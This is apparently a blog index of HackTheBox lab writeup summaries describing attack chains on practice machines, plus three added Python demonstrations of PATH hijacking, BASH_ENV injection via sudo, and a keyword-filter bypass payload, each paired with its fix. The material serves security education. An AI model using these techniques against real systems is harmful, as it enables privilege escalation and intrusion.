Showing posts with the label HackTheBox

Editor Writeup (HackTheBox Easy Machine)

Overview

Editor is an easy Linux machine from HackTheBox. The box relies mainly on careful enumeration and research; some Bash and C knowledge also helps a lot. We start by enumerating an XWiki site and discover a vulnerability that gives us remote code execution. After the foothold, we find a configuration file containing credentials and use them to reach the machine over SSH. During privilege escalation, we find Netdata's ndsudo helper with the SUID bit set. Because it locates the tools it wraps by bare name through PATH, we prepend a directory we control to PATH so that ndsudo executes our malicious executable, elevating our privileges to root.
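
The PATH hijack described above, as an added demonstration that is not code from the writeup or from Netdata. The wrapper below is a stand-in for a program such as ndsudo that executes a helper tool by bare name, so whichever directory PATH lists first decides which file runs; nothing here is SUID, and the helper name `nvme` and all paths are constructed for the example.

```python
"""PATH hijacking of a wrapper that runs helpers by bare name.

Added demonstration; this is not code from the writeup or from Netdata.
The wrapper below stands in for a program such as ndsudo: it executes a
helper tool by name only, so the directory searched first in PATH wins.
Nothing here is SUID; the hijack is shown at the level of name resolution
and of which file actually runs.  Helper name and paths are constructed.
"""
import os
import shutil
import stat
import subprocess
import tempfile

HELPER = "nvme"  # assumed: a tool the wrapper calls by bare name


def install_fake_helper(directory):
    """Drop an attacker-controlled executable named HELPER into `directory`."""
    path = os.path.join(directory, HELPER)
    with open(path, "w") as f:
        # constructed payload: prove which uid ran it instead of doing harm
        f.write('#!/bin/sh\necho "hijacked: $0 ran as uid $(id -u)"\n')
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IRUSR)
    return path


def resolve_helper(search_path):
    """Which file a bare-name lookup of HELPER lands on for this PATH value."""
    return shutil.which(HELPER, path=search_path)


def run_wrapper(env):
    """Stand-in for the privileged wrapper: runs HELPER by bare name.

    subprocess resolves a bare name through the PATH taken from `env`,
    exactly like execvp() in a C wrapper would.  Returns None if no
    executable of that name was found.
    """
    try:
        proc = subprocess.run([HELPER, "list"], env=env,
                              capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return None
    return proc.stdout.strip()


def demo():
    """Run the hijack and the hardened lookup; return what each resolved."""
    with tempfile.TemporaryDirectory() as hijack_dir:
        install_fake_helper(hijack_dir)
        # attacker: export PATH=<writable dir>:$PATH before calling the wrapper
        attacker_path = hijack_dir + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
        attacker_env = dict(os.environ, PATH=attacker_path)
        # hardened wrapper: ignore the caller's PATH and search a fixed trusted one
        trusted_path = "/usr/sbin:/usr/bin:/sbin:/bin"
        hardened_target = resolve_helper(trusted_path)
        return {
            "hijacked_target": resolve_helper(attacker_path),
            "hijacked_output": run_wrapper(attacker_env),
            # True only if the fixed search path could still reach the fake
            "hardened_hits_fake": bool(hardened_target) and hardened_target.startswith(hijack_dir),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

When auditing a SUID wrapper, the check is the same one `demo()` performs: does it run helpers by bare name with the caller's PATH intact, or does it reset PATH to fixed system directories (or use absolute paths) before exec?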

Outbound Writeup (HackTheBox Easy Machine)

As is common in real-life pentests, you start the Outbound box with credentials for the following account: tyler / LhKL1o9Nm3X2

Overview

Outbound is an easy Linux machine from HackTheBox. It depends heavily on enumeration and on noticing the smallest details, and it chains several interesting vulnerabilities. We start by identifying a vulnerable version of Roundcube Webmail, which we exploit for an initial foothold. We then find credentials for the MySQL database and recover some authentication secrets. Combining everything we have found, we decrypt the password of a higher-privileged user. For the final privilege escalation, we once again find a vulnerable software version and use a local privilege escalation exploit to get root and pwn the machine.

Artificial Writeup (HackTheBox Easy Machine)

Overview

Artificial is an easy Linux machine from HackTheBox. As the name implies, it gives us a chance to attack AI models, among other things. We first discover a website that lets us upload our own AI models. We craft a malicious Python model with an embedded shell payload, upload it and receive a reverse shell on the machine. During privilege escalation, we find credentials for the internal Backrest backup service in an old backup file. Abusing Restic's restore function, we can back up arbitrary files to our own machine and read the root flag.

Nmap scan

Starting with the Nmap scan.

┌──(root㉿kali)-[/home/kali]
└─ # nmap -A 10.10.11.74 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-25 20:35 CEST
Nmap scan report for artificial.htb (10.10.11.74)
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RS...

TombWatcher Writeup (HackTheBox Medium Machine)

As is common in real-life Windows pentests, you start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

Overview

TombWatcher is a medium Windows machine from HackTheBox. It is another Active Directory box, and its many misconfigurations let us practise a wide range of AD attacks. After enumeration, we move laterally and compromise a chain of accounts with attacks such as Kerberoasting and abuse of privileges like “ReadGMSAPassword” and “WriteOwner”. During privilege escalation, we restore a deleted CA account and find an ESC15 vulnerability in ADCS. We exploit it to change the Administrator's password, giving us full control over the machine and the domain.

Puppy Writeup (HackTheBox Medium Machine)

As is common in real-life pentests, you start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

Overview

Puppy is a medium Windows machine from HackTheBox. It is an Active Directory challenge that exercises basic to intermediate skills. We start by discovering a KeePass password database on an SMB share. After decrypting it, we gain access to another user who has “GenericAll” over a disabled account. We re-enable that account via LDAP and recover yet another user's credentials from a website backup ZIP file. Next, we abuse DPAPI: we obtain a master key from the DC and use it to decrypt an admin user's stored credentials. This admin user has “DCSync” rights over the domain, so we abuse them to dump the Administrator's hash, compromising the Domain Controller and the entire domain.

Fluffy Writeup (HackTheBox Easy Machine)

As is common in real-life Windows pentests, you start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

Overview

Fluffy is an easy Windows machine from HackTheBox. It is an Active Directory challenge covering certificate abuse, the Shadow Credentials attack and ADCS attacks. We start by discovering a vulnerability report on an SMB share that tells us about unpatched bugs. We trick the DC into connecting back to us and capture the NTLMv2 hash of user “p.agila”. Then we perform the Shadow Credentials attack (certificate abuse via the “msDS-KeyCredentialLink” attribute) against every service account we have write access to, including “ca_svc”, and obtain their NT hashes. Next, using our control over “ca_svc”, we enumerate certificate templates with “certipy”. We discover the ADCS ESC16 vulnerability, which lets us modify our user's UPN and trick the CA into handing us the Administrator's NT hash, granting full control over the domain.

Planning Writeup (HackTheBox Easy Machine)

As is common in real-life pentests, you start the Planning box with credentials for the following account: “admin” / “0D5oT70Fq13EvB5r”.

Overview

Planning is an easy Linux machine from HackTheBox. It is a beginner-friendly box made up of several simple challenges that can still be tricky at times; careful enumeration is key. We start by discovering a hidden subdomain that hosts a Grafana monitoring instance. We exploit a SQL injection that leads to RCE and get a shell inside a Docker container. Among the container's environment variables we find a pair of credentials and use them to log into the host. Next, we find an internal service for managing cron jobs, which we access with other credentials found in the cron job database file. We then add our own malicious cron job and get a root shell.

Environment Writeup (HackTheBox Medium Machine)

Overview

Environment is a medium Linux machine from HackTheBox. The box revolves around environment variables and contains some unusual challenges for intermediate hackers. We start by triggering an exception in the Laravel web application, which exposes a snippet of backend source code. Next, we exploit Laravel's environment manipulation vulnerability via a query-string parameter, switching the environment to “pre-production” and gaining access to the admin dashboard. We then use file upload bypass techniques to get a shell on the machine. Once inside, we compromise another user by decrypting an asymmetrically encrypted PGP backup file, which gives us that user's password list. To get root, we check our sudo configuration and find that the “BASH_ENV” variable is preserved through sudo; since bash sources the file named by BASH_ENV before running a non-interactive script, we can point it at a Bash script of our own. We abuse this to give ourselves a root shell.
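
The BASH_ENV abuse described above, as an added demonstration that is not code from the writeup. sudo itself is not invoked: the two sudoers fragments are constructed text, and the "privileged" run is simulated by filtering the caller's environment the way `env_reset` and `env_keep` would before starting bash. The script name `backup.sh`, the payload and all paths are constructed for the example.

```python
"""BASH_ENV injection via a sudo-preserved environment variable.

Added demonstration; not code from the writeup.  bash sources the file
named by BASH_ENV before running any non-interactive script.  If sudoers
keeps that variable (env_keep) for a rule that runs a bash script, the
caller decides what code runs as root.  sudo itself is not used here: the
two sudoers policies below are constructed text, and the "privileged" run
is simulated by filtering the environment the way env_reset / env_keep
would, then invoking bash.  Script content and paths are constructed.
"""
import os
import subprocess
import tempfile

# constructed sudoers fragments: a rule that leaks BASH_ENV into the
# privileged run, and the default env_reset behaviour that prevents it
SUDOERS_WEAK = 'Defaults env_keep += "BASH_ENV"\nuser ALL=(root) NOPASSWD: /usr/bin/bash /opt/backup.sh\n'
SUDOERS_FIXED = 'Defaults env_reset\nuser ALL=(root) NOPASSWD: /usr/bin/bash /opt/backup.sh\n'


def sudo_environment(caller_env, keep):
    """Build the environment the privileged command sees.

    `keep` models a sudoers env_keep list: those variables are copied from
    the caller, everything else is dropped, which is what env_reset does.
    """
    env = {"PATH": "/usr/bin:/bin"}  # sudo supplies a fixed PATH of its own
    for name in keep:
        if name in caller_env:
            env[name] = caller_env[name]
    return env


def run_as_privileged(script_path, caller_env, keep):
    """Simulated `sudo bash script`: runs the script with the filtered env."""
    env = sudo_environment(caller_env, keep)
    proc = subprocess.run(["bash", script_path], env=env,
                          capture_output=True, text=True, check=False)
    return proc.stdout.strip().splitlines()


def demo():
    """Same script and attacker environment; only the env_keep policy differs."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "backup.sh")
        with open(script, "w") as f:
            f.write('#!/bin/bash\necho "backup done"\n')
        # attacker's file: sourced by bash if BASH_ENV survives into the run
        payload = os.path.join(d, "payload.sh")
        with open(payload, "w") as f:
            f.write('echo "injected: running as $(id -un)"\n')
        # attacker invocation: BASH_ENV=/path/payload.sh sudo bash /opt/backup.sh
        caller_env = {"BASH_ENV": payload, "PATH": "/usr/bin:/bin"}
        return {
            "weak": run_as_privileged(script, caller_env, keep={"BASH_ENV"}),
            "fixed": run_as_privileged(script, caller_env, keep=set()),
        }


if __name__ == "__main__":
    for policy, lines in demo().items():
        print(policy, lines)
```

On a real target the tell is in `sudo -l`: an `env_keep+=BASH_ENV` entry next to a rule whose command is interpreted by bash is exactly the weak policy modelled here.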

Nocturnal Writeup (HackTheBox Easy Machine)

Overview

Nocturnal is an easy Linux machine from HackTheBox. It is great for beginners because it exercises several basic web application vulnerabilities that prepare you for real-world ethical hacking. We start by finding an IDOR that lets us enumerate usernames on the website. We find a file containing the password of another user, who has access to the admin panel. Next, we find a command injection in the backup function and use it to dump the internal MySQL database. Once inside, we discover an internal service, which we access with previously found credentials. Finally, we find a public code execution exploit for it and use it to get a root shell.

Code Writeup (HackTheBox Easy Machine)

Overview

Code is an easy Linux machine from HackTheBox. It serves as an introduction to exploiting Python code execution, specifically to bypassing keyword restrictions by using other functionality. We start by discovering a Python code editor web application that blocks certain keywords which could lead to RCE on the server. We find a way around the restriction and get a shell. On the machine, we find a SQLite database file containing a hashed password for another user. Lastly, we combine our write permissions with another restriction bypass to back up the “/root” directory and get the root flag.
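
Why a keyword deny-list of the kind described above is not a sandbox, as an added demonstration that is not the box's application code. The blocked word list is assumed, the two payloads are constructed, and the example goes slightly beyond the page by also showing an AST-based check that catches this particular payload while still falling short of isolation.

```python
"""Why a keyword deny-list does not sandbox Python code.

Added demonstration; not the box's application code.  The filter mirrors
the idea of an online code editor that rejects source containing dangerous
words before passing it to exec().  The blocked words are assumed.  The
payload reaches the os module without spelling any blocked word, because
Python lets names be assembled at run time.  An AST check that refuses
dunder access catches this particular payload but is still not a sandbox.
"""
import ast
import os

# assumed deny-list, in the spirit of the editor described in the writeup
BLOCKED = ("import", "os", "system", "subprocess", "eval", "exec", "open")

# constructed payloads
DIRECT = "import os\nresult = os.getcwd()\n"
# no blocked word appears as a substring: "__im"+"port__" and chr() for "os"
BYPASS = (
    "result = __builtins__['__im' + 'port__']"
    "(chr(111) + chr(115)).getcwd()\n"
)


def keyword_filter(code):
    """True if the code passes the deny-list and would be executed."""
    lowered = code.lower()
    return not any(word in lowered for word in BLOCKED)


def run_user_code(code):
    """What the vulnerable editor does once the filter passes."""
    if not keyword_filter(code):
        raise ValueError("blocked by keyword filter")
    ns = {}
    # exec() inserts the real builtins dict under __builtins__, so the
    # payload can pull __import__ out of it by a name built at run time
    exec(code, ns)
    return ns.get("result")


def dunder_check(code):
    """Stronger structural check: refuse imports and any '__' name or string.

    Catches BYPASS, but not every variant (a payload can build '__' with
    chr() and reach it through getattr), so this is defence in depth;
    the real fix is running untrusted code in an isolated, unprivileged
    process or container.
    """
    tree = ast.parse(code)
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return False
        if isinstance(node, ast.Name) and "__" in node.id:
            return False
        if isinstance(node, ast.Attribute) and "__" in node.attr:
            return False
        if isinstance(node, ast.Constant) and isinstance(node.value, str) and "__" in node.value:
            return False
    return True


def demo():
    """Summarise what each check does with the two payloads."""
    return {
        "direct_passes_keyword_filter": keyword_filter(DIRECT),
        "bypass_passes_keyword_filter": keyword_filter(BYPASS),
        # the bypass really reached os: same answer as calling os.getcwd() here
        "bypass_reached_os": run_user_code(BYPASS) == os.getcwd(),
        "bypass_passes_dunder_check": dunder_check(BYPASS),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```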

Cypher Writeup (HackTheBox Medium Machine)

Overview

Cypher is a medium Linux machine from HackTheBox. It features some unusual vulnerabilities and forces you to enumerate and research thoroughly. The box starts with several Java class files discovered on the website. Decompiling them reveals a custom function capable of giving us a reverse shell. Next, we discover a less common vulnerability, Cypher injection, with a Neo4j graph database running in the back end. Through this injection we call the custom function and get a foothold on the machine. Inside, we find credentials for another low-privileged user who has sudo permission over the bbot recon scanner. We find that bbot has a debug capability and abuse it to read the root flag.

Dog Writeup (HackTheBox Easy Machine)

Overview

Dog is an easy Linux machine from HackTheBox. It is a good introduction for beginners to several common and important vulnerabilities. We start by discovering an exposed Git repository on the website containing all of its source code. From it we learn which software is in use, a likely username and a pair of database credentials. Using a technique called “credential stuffing”, we log in as the user we found earlier and reach the Backdrop CMS dashboard. We search for and find an authenticated RCE exploit that abuses the installation of custom modules, which gives us the initial foothold. After that, we log in as another user with the same password and discover that we can run Backdrop's “bee” utility with elevated privileges. We abuse its built-in “eval” command to run arbitrary code as the superuser and get a root shell.

Hospital Writeup (HackTheBox Medium Machine)

Overview

Hospital is a medium Windows machine from HackTheBox. It pits you against file upload restrictions, kernel exploits, database dumping, command injection and keylogging. We start by bypassing file upload restrictions while working around functions disabled by the PHP configuration. Once we have a shell in the Linux container, we dump the database and find an exploit for the unpatched Linux kernel, which gives us a root shell there. Next, we crack a hash and use the password to log into Roundcube Webmail. We then abuse a command injection in EPS files processed by Ghostscript to get a shell as another, higher-privileged user. We notice a second session running under our user, use Metasploit's Meterpreter to migrate into a process in that session, and use Meterpreter's additional functionality to take a screenshot of the desktop and capture keystrokes. Since that user was logging into Webmail as Administrator, we capture the Administrator's password in the process.

Bucket Writeup (HackTheBox Medium Machine)

Overview

Bucket is a medium Linux machine from HackTheBox. It introduces you to cloud hacking (sort of) and lets you play with an AWS S3 bucket, showcasing common misconfigurations. We start by discovering a subdomain that exposes an S3 bucket holding the files served by the web server. Enumerating it with the “aws” CLI, we find that we can both download and upload files, so we upload a PHP reverse shell and get an initial foothold. Once in, we dump the exposed DynamoDB tables and get the credentials of user “roy”, followed by the user flag. Next, we discover several internal services. In Roy's project files we find source code with an SSRF vulnerability that leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.

Support Writeup (HackTheBox Easy Machine)

Overview

Support is an easy Windows machine from HackTheBox. It is ideal for beginners because it touches common vulnerabilities from several fields, such as Windows Active Directory and reverse engineering. Although the box is rated easy, it can still trip you up, as it did me. We start by discovering an interesting binary on an SMB share. Reverse engineering it with dnSpy reveals a hardcoded encrypted password for one of the users; we XOR the encrypted password with a key and recover the cleartext. Next, we run an LDAP search and find another cleartext password for another user. We soon find that this user belongs to a special group with full control over the Domain Controller. We abuse that permission by creating a fake account and configuring the DC to allow it to act on behalf of another identity.

Lame Writeup (HackTheBox Easy Machine)

Overview

Lame is an easy Linux machine from HackTheBox. It is one of the quickest boxes on the platform, but it involves some big and infamous vulnerabilities. We start by discovering several services on open ports. We find that vsftpd 2.3.4 is in use, a version known to contain a backdoor. We tried the exploit provided by Metasploit, but it did not work; as we find out later, a firewall is blocking us. After that, we perform additional enumeration on the machine. Eventually, we notice that SMB is also running vulnerable software, Samba 3.0.20. We use Metasploit's “Username map script” exploit to get a root shell on the machine and collect both the user and root flags.